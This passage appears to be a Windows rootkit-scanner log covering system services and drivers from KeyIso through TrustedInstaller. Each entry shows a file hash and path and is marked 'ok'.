18:04:08.0904 5696 KeyIso - ok
18:04:08.0934 5696 [ 4A1445EFA932A3BAF5BDB02D7131EE20 ] KSecDD C:\Windows\system32\Drivers\ksecdd.sys
18:04:08.0984 5696 KSecDD - ok
18:04:09.0064 5696 [ 8078F8F8F7A79E2E6B494523A828C585 ] KtmRm C:\Windows\system32\msdtckrm.dll
18:04:09.0124 5696 KtmRm - ok
18:04:09.0174 5696 [ 1BF5EEBFD518DD7298434D8C862F825D ] LanmanServer C:\Windows\system32\srvsvc.dll
18:04:09.0234 5696 LanmanServer - ok
18:04:09.0264 5696 [ 1DB69705B695B987082C8BAEC0C6B34F ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
18:04:09.0314 5696 LanmanWorkstation - ok
18:04:09.0334 5696 [ D1C5883087A0C3F1344D9D55A44901F6 ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys
18:04:09.0394 5696 lltdio - ok
18:04:09.0434 5696 [ 2D5A428872F1442631D0959A34ABFF63 ] lltdsvc C:\Windows\System32\lltdsvc.dll
18:04:09.0494 5696 lltdsvc - ok
18:04:09.0534 5696 [ 35D40113E4A5B961B6CE5C5857702518 ] lmhosts C:\Windows\System32\lmhsvc.dll
18:04:09.0584 5696 lmhosts - ok
18:04:09.0634 5696 [ A2262FB9F28935E862B4DB46438C80D2 ] LSI_FC C:\Windows\system32\drivers\lsi_fc.sys
18:04:09.0654 5696 LSI_FC - ok
18:04:09.0664 5696 [ 30D73327D390F72A62F32C103DAF1D6D ] LSI_SAS C:\Windows\system32\drivers\lsi_sas.sys
18:04:09.0684 5696 LSI_SAS - ok
18:04:09.0694 5696 [ E1E36FEFD45849A95F1AB81DE0159FE3 ] LSI_SCSI C:\Windows\system32\drivers\lsi_scsi.sys
18:04:09.0714 5696 LSI_SCSI - ok
18:04:09.0754 5696 [ 23B55D27A0AFB7FE9CBCB20B617CC168 ] Ltn_stk7070P C:\Windows\system32\DRIVERS\Ltn_stk7070P.sys
18:04:09.0854 5696 Ltn_stk7070P - ok
18:04:09.0904 5696 [ 1FA7503D019291C027FEDAE509BC5500 ] Ltn_stkrc C:\Windows\system32\DRIVERS\Ltn_stkrc.sys
18:04:09.0964 5696 Ltn_stkrc - ok
18:04:09.0994 5696 [ 8F5C7426567798E62A3B3614965D62CC ] luafv C:\Windows\system32\drivers\luafv.sys
18:04:10.0024 5696 luafv - ok
18:04:10.0044 5696 [ D153B14FC6598EAE8422A2037553ADCE ] megasas C:\Windows\system32\drivers\megasas.sys
18:04:10.0064 5696 megasas - ok
18:04:10.0094 5696 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] MMCSS C:\Windows\system32\mmcss.dll
18:04:10.0154 5696 MMCSS - ok
18:04:10.0204 5696 [ E13B5EA0F51BA5B1512EC671393D09BA ] Modem C:\Windows\system32\drivers\modem.sys
18:04:10.0254 5696 Modem - ok
18:04:10.0304 5696 [ 0A9BB33B56E294F686ABB7C1E4E2D8A8 ] monitor C:\Windows\system32\DRIVERS\monitor.sys
18:04:10.0354 5696 monitor - ok
18:04:10.0384 5696 [ 5BF6A1326A335C5298477754A506D263 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys
18:04:10.0404 5696 mouclass - ok
18:04:10.0424 5696 [ 93B8D4869E12CFBE663915502900876F ] mouhid C:\Windows\system32\DRIVERS\mouhid.sys
18:04:10.0464 5696 mouhid - ok
18:04:10.0494 5696 [ BDAFC88AA6B92F7842416EA6A48E1600 ] MountMgr C:\Windows\system32\drivers\mountmgr.sys
18:04:10.0524 5696 MountMgr - ok
18:04:10.0614 5696 [ 51A84B690DF519DCF656F780243D953E ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
18:04:10.0654 5696 MozillaMaintenance - ok
18:04:10.0694 5696 [ 583A41F26278D9E0EA548163D6139397 ] mpio C:\Windows\system32\drivers\mpio.sys
18:04:10.0714 5696 mpio - ok
18:04:10.0744 5696 [ 22241FEBA9B2DEFA669C8CB0A8DD7D2E ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys
18:04:10.0784 5696 mpsdrv - ok
18:04:10.0834 5696 [ 5DE62C6E9108F14F6794060A9BDECAEC ] MpsSvc C:\Windows\system32\mpssvc.dll
18:04:10.0874 5696 MpsSvc - ok
18:04:10.0894 5696 [ 4FBBB70D30FD20EC51F80061703B001E ] Mraid35x C:\Windows\system32\drivers\mraid35x.sys
18:04:10.0914 5696 Mraid35x - ok
18:04:10.0944 5696 [ 82CEA0395524AACFEB58BA1448E8325C ] MRxDAV C:\Windows\system32\drivers\mrxdav.sys
18:04:10.0974 5696 MRxDAV - ok
18:04:11.0004 5696 [ 1E94971C4B446AB2290DEB71D01CF0C2 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys
18:04:11.0074 5696 mrxsmb - ok
18:04:11.0144 5696 [ 4FCCB34D793B116423209C0F8B7A3B03 ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys
18:04:11.0194 5696 mrxsmb10 - ok
18:04:11.0204 5696 [ C3CB1B40AD4A0124D617A1199B0B9D7C ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys
18:04:11.0254 5696 mrxsmb20 - ok
18:04:11.0284 5696 [ 5457DCFA7C0DA43522F4D9D4049C1472 ] msahci C:\Windows\system32\drivers\msahci.sys
18:04:11.0304 5696 msahci - ok
18:04:11.0334 5696 [ 3FC82A2AE4CC149165A94699183D3028 ] msdsm C:\Windows\system32\drivers\msdsm.sys
18:04:11.0354 5696 msdsm - ok
18:04:11.0384 5696 [ FD7520CC3A80C5FC8C48852BB24C6DED ] MSDTC C:\Windows\System32\msdtc.exe
18:04:11.0424 5696 MSDTC - ok
18:04:11.0454 5696 [ A9927F4A46B816C92F461ACB90CF8515 ] Msfs C:\Windows\system32\drivers\Msfs.sys
18:04:11.0484 5696 Msfs - ok
18:04:11.0504 5696 [ 0F400E306F385C56317357D6DEA56F62 ] msisadrv C:\Windows\system32\drivers\msisadrv.sys
18:04:11.0514 5696 msisadrv - ok
18:04:11.0544 5696 [ 85466C0757A23D9A9AECDC0755203CB2 ] MSiSCSI C:\Windows\system32\iscsiexe.dll
18:04:11.0594 5696 MSiSCSI - ok
18:04:11.0604 5696 msiserver - ok
18:04:11.0624 5696 [ D8C63D34D9C9E56C059E24EC7185CC07 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys
18:04:11.0674 5696 MSKSSRV - ok
18:04:11.0704 5696 [ 1D373C90D62DDB641D50E55B9E78D65E ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys
18:04:11.0737 5696 MSPCLOCK - ok
18:04:11.0743 5696 [ B572DA05BF4E098D4BBA3A4734FB505B ] MSPQM C:\Windows\system32\drivers\MSPQM.sys
18:04:11.0791 5696 MSPQM - ok
18:04:11.0849 5696 [ B49456D70555DE905C311BCDA6EC6ADB ] MsRPC C:\Windows\system32\drivers\MsRPC.sys
18:04:11.0886 5696 MsRPC - ok
18:04:11.0909 5696 [ E384487CB84BE41D09711C30CA79646C ] mssmbios C:\Windows\system32\DRIVERS\mssmbios.sys
18:04:11.0925 5696 mssmbios - ok
18:04:11.0935 5696 [ 7199C1EEC1E4993CAF96B8C0A26BD58A ] MSTEE C:\Windows\system32\drivers\MSTEE.sys
18:04:11.0984 5696 MSTEE - ok
18:04:12.0005 5696 [ 6A57B5733D4CB702C8EA4542E836B96C ] Mup C:\Windows\system32\Drivers\mup.sys
18:04:12.0027 5696 Mup - ok
18:04:12.0053 5696 [ E4EAF0C5C1B41B5C83386CF212CA9584 ] napagent C:\Windows\system32\qagentRT.dll
18:04:12.0097 5696 napagent - ok
18:04:12.0130 5696 [ 85C44FDFF9CF7E72A40DCB7EC06A4416 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys
18:04:12.0158 5696 NativeWifiP - ok
18:04:12.0215 5696 [ 1357274D1883F68300AEADD15D7BBB42 ] NDIS C:\Windows\system32\drivers\ndis.sys
18:04:12.0249 5696 NDIS - ok
18:04:12.0270 5696 [ 0E186E90404980569FB449BA7519AE61 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys
18:04:12.0315 5696 NdisTapi - ok
18:04:12.0341 5696 [ D6973AA34C4D5D76C0430B181C3CD389 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys
18:04:12.0385 5696 Ndisuio - ok
18:04:12.0405 5696 [ 818F648618AE34F729FDB47EC68345C3 ] NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys
18:04:12.0453 5696 NdisWan - ok
18:04:12.0479 5696 [ 71DAB552B41936358F3B541AE5997FB3 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys
18:04:12.0524 5696 NDProxy - ok
18:04:12.0543 5696 [ BCD093A5A6777CF626434568DC7DBA78 ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys
18:04:12.0576 5696 NetBIOS - ok
18:04:12.0607 5696 [ ECD64230A59CBD93C85F1CD1CAB9F3F6 ] netbt C:\Windows\system32\DRIVERS\netbt.sys
18:04:12.0664 5696 netbt - ok
18:04:12.0692 5696 [ A3E186B4B935905B829219502557314E ] Netlogon C:\Windows\system32\lsass.exe
18:04:12.0707 5696 Netlogon - ok
18:04:12.0739 5696 [ C8052711DAECC48B982434C5116CA401 ] Netman C:\Windows\System32\netman.dll
18:04:12.0799 5696 Netman - ok
18:04:12.0827 5696 [ 2EF3BBE22E5A5ACD1428EE387A0D0172 ] netprofm C:\Windows\System32\netprofm.dll
18:04:12.0878 5696 netprofm - ok
18:04:12.0913 5696 [ D6C4E4A39A36029AC0813D476FBD0248 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
18:04:12.0943 5696 NetTcpPortSharing - ok
18:04:13.0121 5696 [ 8DE67BD902095A13329FD82C85A1FA09 ] NETw5v32 C:\Windows\system32\DRIVERS\NETw5v32.sys
18:04:13.0474 5696 NETw5v32 - ok
18:04:13.0505 5696 [ 2E7FB731D4790A1BC6270ACCEFACB36E ] nfrd960 C:\Windows\system32\drivers\nfrd960.sys
18:04:13.0537 5696 nfrd960 - ok
18:04:13.0568 5696 [ 2997B15415F9BBE05B5A4C1C85E0C6A2 ] NlaSvc C:\Windows\System32\nlasvc.dll
18:04:13.0646 5696 NlaSvc - ok
18:04:13.0677 5696 [ D36F239D7CCE1931598E8FB90A0DBC26 ] Npfs C:\Windows\system32\drivers\Npfs.sys
18:04:13.0724 5696 Npfs - ok
18:04:13.0771 5696 [ 8BB86F0C7EEA2BDED6FE095D0B4CA9BD ] nsi C:\Windows\system32\nsisvc.dll
18:04:13.0786 5696 nsi - ok
18:04:13.0817 5696 [ 609773E344A97410CE4EBF74A8914FCF ] nsiproxy C:\Windows\system32\drivers\nsiproxy.sys
18:04:13.0880 5696 nsiproxy - ok
18:04:13.0958 5696 [ 6A4A98CEE84CF9E99564510DDA4BAA47 ] Ntfs C:\Windows\system32\drivers\Ntfs.sys
18:04:14.0020 5696 Ntfs - ok
18:04:14.0067 5696 [ E875C093AEC0C978A90F30C9E0DFBB72 ] ntrigdigi C:\Windows\system32\drivers\ntrigdigi.sys
18:04:14.0114 5696 ntrigdigi - ok
18:04:14.0161 5696 [ C5DBBCDA07D780BDA9B685DF333BB41E ] Null C:\Windows\system32\drivers\Null.sys
18:04:14.0207 5696 Null - ok
18:04:14.0239 5696 [ E69E946F80C1C31C53003BFBF50CBB7C ] nvraid C:\Windows\system32\drivers\nvraid.sys
18:04:14.0254 5696 nvraid - ok
18:04:14.0285 5696 [ 9E0BA19A28C498A6D323D065DB76DFFC ] nvstor C:\Windows\system32\drivers\nvstor.sys
18:04:14.0301 5696 nvstor - ok
18:04:14.0317 5696 [ 07C186427EB8FCC3D8D7927187F260F7 ] nv_agp C:\Windows\system32\drivers\nv_agp.sys
18:04:14.0332 5696 nv_agp - ok
18:04:14.0348 5696 NwlnkFlt - ok
18:04:14.0348 5696 NwlnkFwd - ok
18:04:14.0379 5696 [ BE32DA025A0BE1878F0EE8D6D9386CD5 ] ohci1394 C:\Windows\system32\drivers\ohci1394.sys
18:04:14.0439 5696 ohci1394 - ok
18:04:14.0479 5696 [ 0C8E8E61AD1EB0B250B846712C917506 ] p2pimsvc C:\Windows\system32\p2psvc.dll
18:04:14.0569 5696 p2pimsvc - ok
18:04:14.0579 5696 [ 0C8E8E61AD1EB0B250B846712C917506 ] p2psvc C:\Windows\system32\p2psvc.dll
18:04:14.0609 5696 p2psvc - ok
18:04:14.0719 5696 [ 0FA9B5055484649D63C303FE404E5F4D ] Parport C:\Windows\system32\drivers\parport.sys
18:04:14.0809 5696 Parport - ok
18:04:14.0869 5696 [ B9C2B89F08670E159F7181891E449CD9 ] partmgr C:\Windows\system32\drivers\partmgr.sys
18:04:14.0889 5696 partmgr - ok
18:04:14.0899 5696 [ 4F9A6A8A31413180D0FCB279AD5D8112 ] Parvdm C:\Windows\system32\drivers\parvdm.sys
18:04:14.0959 5696 Parvdm - ok
18:04:14.0989 5696 [ C6276AD11F4BB49B58AA1ED88537F14A ] PcaSvc C:\Windows\System32\pcasvc.dll
18:04:15.0039 5696 PcaSvc - ok
18:04:15.0059 5696 [ 941DC1D19E7E8620F40BBC206981EFDB ] pci C:\Windows\system32\drivers\pci.sys
18:04:15.0119 5696 pci - ok
18:04:15.0149 5696 [ 3B1901E401473E03EB8C874271E50C26 ] pciide C:\Windows\system32\drivers\pciide.sys
18:04:15.0179 5696 pciide - ok
18:04:15.0199 5696 [ E6F3FB1B86AA519E7698AD05E58B04E5 ] pcmcia C:\Windows\system32\drivers\pcmcia.sys
18:04:15.0229 5696 pcmcia - ok
18:04:15.0279 5696 [ 6349F6ED9C623B44B52EA3C63C831A92 ] PEAUTH C:\Windows\system32\drivers\peauth.sys
18:04:15.0409 5696 PEAUTH - ok
18:04:15.0499 5696 [ B1689DF169143F57053F795390C99DB3 ] pla C:\Windows\system32\pla.dll
18:04:15.0609 5696 pla - ok
18:04:15.0659 5696 [ C5E7F8A996EC0A82D508FD9064A5569E ] PlugPlay C:\Windows\system32\umpnpmgr.dll
18:04:15.0679 5696 PlugPlay - ok
18:04:15.0709 5696 [ 0C8E8E61AD1EB0B250B846712C917506 ] PNRPAutoReg C:\Windows\system32\p2psvc.dll
18:04:15.0739 5696 PNRPAutoReg - ok
18:04:15.0759 5696 [ 0C8E8E61AD1EB0B250B846712C917506 ] PNRPsvc C:\Windows\system32\p2psvc.dll
18:04:15.0779 5696 PNRPsvc - ok
18:04:15.0849 5696 [ D0494460421A03CD5225CCA0059AA146 ] PolicyAgent C:\Windows\System32\ipsecsvc.dll
18:04:15.0909 5696 PolicyAgent - ok
18:04:15.0959 5696 [ ECFFFAEC0C1ECD8DBC77F39070EA1DB1 ] PptpMiniport C:\Windows\system32\DRIVERS\raspptp.sys
18:04:15.0999 5696 PptpMiniport - ok
18:04:16.0029 5696 [ 0E3CEF5D28B40CF273281D620C50700A ] Processor C:\Windows\system32\drivers\processr.sys
18:04:16.0099 5696 Processor - ok
18:04:16.0149 5696 [ 0508FAA222D28835310B7BFCA7A77346 ] ProfSvc C:\Windows\system32\profsvc.dll
18:04:16.0169 5696 ProfSvc - ok
18:04:16.0179 5696 [ A3E186B4B935905B829219502557314E ] ProtectedStorage C:\Windows\system32\lsass.exe
18:04:16.0199 5696 ProtectedStorage - ok
18:04:16.0239 5696 [ 99514FAA8DF93D34B5589187DB3AA0BA ] PSched C:\Windows\system32\DRIVERS\pacer.sys
18:04:16.0269 5696 PSched - ok
18:04:16.0329 5696 [ CCDAC889326317792480C0A67156A1EC ] ql2300 C:\Windows\system32\drivers\ql2300.sys
18:04:16.0389 5696 ql2300 - ok
18:04:16.0419 5696 [ 81A7E5C076E59995D54BC1ED3A16E60B ] ql40xx C:\Windows\system32\drivers\ql40xx.sys
18:04:16.0439 5696 ql40xx - ok
18:04:16.0459 5696 [ E9ECAE663F47E6CB43962D18AB18890F ] QWAVE C:\Windows\system32\qwave.dll
18:04:16.0519 5696 QWAVE - ok
18:04:16.0549 5696 [ 9F5E0E1926014D17486901C88ECA2DB7 ] QWAVEdrv C:\Windows\system32\drivers\qwavedrv.sys
18:04:16.0569 5696 QWAVEdrv - ok
18:04:16.0589 5696 [ 147D7F9C556D259924351FEB0DE606C3 ] RasAcd C:\Windows\system32\DRIVERS\rasacd.sys
18:04:16.0619 5696 RasAcd - ok
18:04:16.0649 5696 [ F6A452EB4CEADBB51C9E0EE6B3ECEF0F ] RasAuto C:\Windows\System32\rasauto.dll
18:04:16.0699 5696 RasAuto - ok
18:04:16.0739 5696 [ A214ADBAF4CB47DD2728859EF31F26B0 ] Rasl2tp C:\Windows\system32\DRIVERS\rasl2tp.sys
18:04:16.0789 5696 Rasl2tp - ok
18:04:16.0839 5696 [ 75D47445D70CA6F9F894B032FBC64FCF ] RasMan C:\Windows\System32\rasmans.dll
18:04:16.0883 5696 RasMan - ok
18:04:16.0915 5696 [ 509A98DD18AF4375E1FC40BC175F1DEF ] RasPppoe C:\Windows\system32\DRIVERS\raspppoe.sys
18:04:16.0982 5696 RasPppoe - ok
18:04:16.0993 5696 [ 2005F4A1E05FA09389AC85840F0A9E4D ] RasSstp C:\Windows\system32\DRIVERS\rassstp.sys
18:04:17.0038 5696 RasSstp - ok
18:04:17.0072 5696 [ B14C9D5B9ADD2F84F70570BBBFAA7935 ] rdbss C:\Windows\system32\DRIVERS\rdbss.sys
18:04:17.0108 5696 rdbss - ok
18:04:17.0140 5696 [ 89E59BE9A564262A3FB6C4F4F1CD9899 ] RDPCDD C:\Windows\system32\DRIVERS\RDPCDD.sys
18:04:17.0196 5696 RDPCDD - ok
18:04:17.0253 5696 [ E8BD98D46F2ED77132BA927FCCB47D8B ] rdpdr C:\Windows\system32\drivers\rdpdr.sys
18:04:17.0370 5696 rdpdr - ok
18:04:17.0379 5696 [ 9D91FE5286F748862ECFFA05F8A0710C ] RDPENCDD C:\Windows\system32\drivers\rdpencdd.sys
18:04:17.0422 5696 RDPENCDD - ok
18:04:17.0484 5696 [ C127EBD5AFAB31524662C48DFCEB773A ] RDPWD C:\Windows\system32\drivers\RDPWD.sys
18:04:17.0550 5696 RDPWD - ok
18:04:17.0576 5696 [ BCDD6B4804D06B1F7EBF29E53A57ECE9 ] RemoteAccess C:\Windows\System32\mprdim.dll
18:04:17.0612 5696 RemoteAccess - ok
18:04:17.0657 5696 [ 9E6894EA18DAFF37B63E1005F83AE4AB ] RemoteRegistry C:\Windows\system32\regsvc.dll
18:04:17.0703 5696 RemoteRegistry - ok
18:04:17.0735 5696 [ 6482707F9F4DA0ECBAB43B2E0398A101 ] RFCOMM C:\Windows\system32\DRIVERS\rfcomm.sys
18:04:17.0767 5696 RFCOMM - ok
18:04:17.0792 5696 [ 5123F83CBC4349D065534EEB6BBDC42B ] RpcLocator C:\Windows\system32\locator.exe
18:04:17.0867 5696 RpcLocator - ok
18:04:17.0905 5696 [ 3B5B4D53FEC14F7476CA29A20CC31AC9 ] RpcSs C:\Windows\system32\rpcss.dll
18:04:17.0943 5696 RpcSs - ok
18:04:17.0974 5696 [ 9C508F4074A39E8B4B31D27198146FAD ] rspndr C:\Windows\system32\DRIVERS\rspndr.sys
18:04:18.0055 5696 rspndr - ok
18:04:18.0063 5696 [ A3E186B4B935905B829219502557314E ] SamSs C:\Windows\system32\lsass.exe
18:04:18.0082 5696 SamSs - ok
18:04:18.0130 5696 [ 3CE8F073A557E172B330109436984E30 ] sbp2port C:\Windows\system32\drivers\sbp2port.sys
18:04:18.0159 5696 sbp2port - ok
18:04:18.0194 5696 [ 77B7A11A0C3D78D3386398FBBEA1B632 ] SCardSvr C:\Windows\System32\SCardSvr.dll
18:04:18.0250 5696 SCardSvr - ok
18:04:18.0308 5696 [ 1A58069DB21D05EB2AB58EE5753EBE8D ] Schedule C:\Windows\system32\schedsvc.dll
18:04:18.0402 5696 Schedule - ok
18:04:18.0417 5696 [ 312EC3E37A0A1F2006534913E37B4423 ] SCPolicySvc C:\Windows\System32\certprop.dll
18:04:18.0449 5696 SCPolicySvc - ok
18:04:18.0480 5696 [ 716313D9F6B0529D03F726D5AAF6F191 ] SDRSVC C:\Windows\System32\SDRSVC.dll
18:04:18.0558 5696 SDRSVC - ok
18:04:18.0573 5696 [ 90A3935D05B494A5A39D37E71F09A677 ] secdrv C:\Windows\system32\drivers\secdrv.sys
18:04:18.0651 5696 secdrv - ok
18:04:18.0683 5696 [ FD5199D4D8A521005E4B5EE7FE00FA9B ] seclogon C:\Windows\system32\seclogon.dll
18:04:18.0714 5696 seclogon - ok
18:04:18.0729 5696 [ A9BBAB5759771E523F55563D6CBE140F ] SENS C:\Windows\System32\sens.dll
18:04:18.0776 5696 SENS - ok
18:04:18.0807 5696 [ 68E44E331D46F0FB38F0863A84CD1A31 ] Serenum C:\Windows\system32\drivers\serenum.sys
18:04:18.0885 5696 Serenum - ok
18:04:18.0917 5696 [ C70D69A918B178D3C3B06339B40C2E1B ] Serial C:\Windows\system32\drivers\serial.sys
18:04:18.0982 5696 Serial - ok
18:04:19.0012 5696 [ 8AF3D28A879BF75DB53A0EE7A4289624 ] sermouse C:\Windows\system32\drivers\sermouse.sys
18:04:19.0052 5696 sermouse - ok
18:04:19.0072 5696 [ D2193326F729B163125610DBF3E17D57 ] SessionEnv C:\Windows\system32\sessenv.dll
18:04:19.0122 5696 SessionEnv - ok
18:04:19.0162 5696 [ 103B79418DA647736EE95645F305F68A ] sffdisk C:\Windows\system32\drivers\sffdisk.sys
18:04:19.0222 5696 sffdisk - ok
18:04:19.0252 5696 [ 8FD08A310645FE872EEEC6E08C6BF3EE ] sffp_mmc C:\Windows\system32\drivers\sffp_mmc.sys
18:04:19.0322 5696 sffp_mmc - ok
18:04:19.0342 5696 [ 9CFA05FCFCB7124E69CFC812B72F9614 ] sffp_sd C:\Windows\system32\drivers\sffp_sd.sys
18:04:19.0392 5696 sffp_sd - ok
18:04:19.0412 5696 [ 46ED8E91793B2E6F848015445A0AC188 ] sfloppy C:\Windows\system32\drivers\sfloppy.sys
18:04:19.0462 5696 sfloppy - ok
18:04:19.0482 5696 [ E1499BD0FF76B1B2FBBF1AF339D91165 ] SharedAccess C:\Windows\System32\ipnathlp.dll
18:04:19.0522 5696 SharedAccess - ok
18:04:19.0552 5696 [ C7230FBEE14437716701C15BE02C27B8 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
18:04:19.0582 5696 ShellHWDetection - ok
18:04:19.0612 5696 [ D2A595D6EEBEEAF4334F8E50EFBC9931 ] sisagp C:\Windows\system32\drivers\sisagp.sys
18:04:19.0632 5696 sisagp - ok
18:04:19.0642 5696 [ CEDD6F4E7D84E9F98B34B3FE988373AA ] SiSRaid2 C:\Windows\system32\drivers\sisraid2.sys
18:04:19.0662 5696 SiSRaid2 - ok
18:04:19.0682 5696 [ DF843C528C4F69D12CE41CE462E973A7 ] SiSRaid4 C:\Windows\system32\drivers\sisraid4.sys
18:04:19.0702 5696 SiSRaid4 - ok
18:04:19.0802 5696 [ 862BB4CBC05D80C5B45BE430E5EF872F ] slsvc C:\Windows\system32\SLsvc.exe
18:04:20.0502 5696 slsvc - ok
18:04:20.0532 5696 [ 6EDC422215CD78AA8A9CDE6B30ABBD35 ] SLUINotify C:\Windows\system32\SLUINotify.dll
18:04:20.0572 5696 SLUINotify - ok
18:04:20.0592 5696 [ 7B75299A4D201D6A6533603D6914AB04 ] Smb C:\Windows\system32\DRIVERS\smb.sys
18:04:20.0622 5696 Smb - ok
18:04:20.0662 5696 [ 2A146A055B4401C16EE62D18B8E2A032 ] SNMPTRAP C:\Windows\System32\snmptrap.exe
18:04:20.0682 5696 SNMPTRAP - ok
18:04:20.0732 5696 [ 50660E6B082A7BF86751A003C3BB5210 ] SNP2UVC C:\Windows\system32\DRIVERS\snp2uvc.sys
18:04:20.0822 5696 SNP2UVC - ok
18:04:20.0842 5696 [ 7AEBDEEF071FE28B0EEF2CDD69102BFF ] spldr C:\Windows\system32\drivers\spldr.sys
18:04:20.0861 5696 spldr - ok
18:04:20.0883 5696 [ 8554097E5136C3BF9F69FE578A1B35F4 ] Spooler C:\Windows\System32\spoolsv.exe
18:04:20.0926 5696 Spooler - ok
18:04:20.0960 5696 [ 41987F9FC0E61ADF54F581E15029AD91 ] srv C:\Windows\system32\DRIVERS\srv.sys
18:04:21.0002 5696 srv - ok
18:04:21.0034 5696 [ FF33AFF99564B1AA534F58868CBE41EF ] srv2 C:\Windows\system32\DRIVERS\srv2.sys
18:04:21.0071 5696 srv2 - ok
18:04:21.0087 5696 [ 7605C0E1D01A08F3ECD743F38B834A44 ] srvnet C:\Windows\system32\DRIVERS\srvnet.sys
18:04:21.0114 5696 srvnet - ok
18:04:21.0145 5696 [ 03D50B37234967433A5EA5BA72BC0B62 ] SSDPSRV C:\Windows\System32\ssdpsrv.dll
18:04:21.0210 5696 SSDPSRV - ok
18:04:21.0249 5696 [ A36EE93698802CD899F98BFD553D8185 ] ssmdrv C:\Windows\system32\DRIVERS\ssmdrv.sys
18:04:21.0279 5696 ssmdrv - ok
18:04:21.0317 5696 [ 6F1A32E7B7B30F004D9A20AFADB14944 ] SstpSvc C:\Windows\system32\sstpsvc.dll
18:04:21.0379 5696 SstpSvc - ok
18:04:21.0414 5696 [ 5DE7D67E49B88F5F07F3E53C4B92A352 ] stisvc C:\Windows\System32\wiaservc.dll
18:04:21.0465 5696 stisvc - ok
18:04:21.0497 5696 [ 7BA58ECF0C0A9A69D44B3DCA62BECF56 ] swenum C:\Windows\system32\DRIVERS\swenum.sys
18:04:21.0514 5696 swenum - ok
18:04:21.0547 5696 [ F21FD248040681CCA1FB6C9A03AAA93D ] swprv C:\Windows\System32\swprv.dll
18:04:21.0602 5696 swprv - ok
18:04:21.0637 5696 [ 192AA3AC01DF071B541094F251DEED10 ] Symc8xx C:\Windows\system32\drivers\symc8xx.sys
18:04:21.0655 5696 Symc8xx - ok
18:04:21.0667 5696 [ 8C8EB8C76736EBAF3B13B633B2E64125 ] Sym_hi C:\Windows\system32\drivers\sym_hi.sys
18:04:21.0685 5696 Sym_hi - ok
18:04:21.0703 5696 [ 8072AF52B5FD103BBBA387A1E49F62CB ] Sym_u3 C:\Windows\system32\drivers\sym_u3.sys
18:04:21.0722 5696 Sym_u3 - ok
18:04:21.0795 5696 [ 0E8676FB3BB95AA40FDF7A4A31018C8B ] SynTP C:\Windows\system32\DRIVERS\SynTP.sys
18:04:21.0874 5696 SynTP - ok
18:04:21.0917 5696 [ 9A51B04E9886AA4EE90093586B0BA88D ] SysMain C:\Windows\system32\sysmain.dll
18:04:21.0952 5696 SysMain - ok
18:04:21.0979 5696 [ 2DCA225EAE15F42C0933E998EE0231C3 ] TabletInputService C:\Windows\System32\TabSvc.dll
18:04:22.0010 5696 TabletInputService - ok
18:04:22.0048 5696 [ FD90A16CEB10D4FDAA00AAF39B8FF58F ] taphss C:\Windows\system32\DRIVERS\taphss.sys
18:04:22.0086 5696 taphss - ok
18:04:22.0118 5696 [ D7673E4B38CE21EE54C59EEEB65E2483 ] TapiSrv C:\Windows\System32\tapisrv.dll
18:04:22.0149 5696 TapiSrv - ok
18:04:22.0164 5696 [ CB05822CD9CC6C688168E113C603DBE7 ] TBS C:\Windows\System32\tbssvc.dll
18:04:22.0196 5696 TBS - ok
18:04:22.0251 5696 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip C:\Windows\system32\drivers\tcpip.sys
18:04:22.0311 5696 Tcpip - ok
18:04:22.0331 5696 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip6 C:\Windows\system32\DRIVERS\tcpip.sys
18:04:22.0361 5696 Tcpip6 - ok
18:04:22.0391 5696 [ 608C345A255D82A6289C2D468EB41FD7 ] tcpipreg C:\Windows\system32\drivers\tcpipreg.sys
18:04:22.0431 5696 tcpipreg - ok
18:04:22.0461 5696 [ 5DCF5E267BE67A1AE926F2DF77FBCC56 ] TDPIPE C:\Windows\system32\drivers\tdpipe.sys
18:04:22.0511 5696 TDPIPE - ok
18:04:22.0541 5696 [ 389C63E32B3CEFED425B61ED92D3F021 ] TDTCP C:\Windows\system32\drivers\tdtcp.sys
18:04:22.0591 5696 TDTCP - ok
18:04:22.0631 5696 [ 76B06EB8A01FC8624D699E7045303E54 ] tdx C:\Windows\system32\DRIVERS\tdx.sys
18:04:22.0661 5696 tdx - ok
18:04:22.0783 5696 [ 9F3E7CABE86BBDECA009DE291DB6D9E2 ] TeamViewer8 C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe
18:04:22.0987 5696 TeamViewer8 - ok
18:04:23.0009 5696 [ 3CAD38910468EAB9A6479E2F01DB43C7 ] TermDD C:\Windows\system32\DRIVERS\termdd.sys
18:04:23.0030 5696 TermDD - ok
18:04:23.0054 5696 [ BB95DA09BEF6E7A131BFF3BA5032090D ] TermService C:\Windows\System32\termsrv.dll
18:04:23.0108 5696 TermService - ok
18:04:23.0159 5696 [ C7230FBEE14437716701C15BE02C27B8 ] Themes C:\Windows\system32\shsvcs.dll
18:04:23.0264 5696 Themes - ok
18:04:23.0331 5696 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] THREADORDER C:\Windows\system32\mmcss.dll
18:04:23.0408 5696 THREADORDER - ok
18:04:23.0437 5696 [ EC74E77D0EB004BD3A809B5F8FB8C2CE ] TrkWks C:\Windows\System32\trkwks.dll
18:04:23.0467 5696 TrkWks - ok
18:04:23.0502 5696 [ 97D9D6A04E3AD9B6C626B9931DB78DBA ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
18:04:23.0536 5696 TrustedInstaller - ok
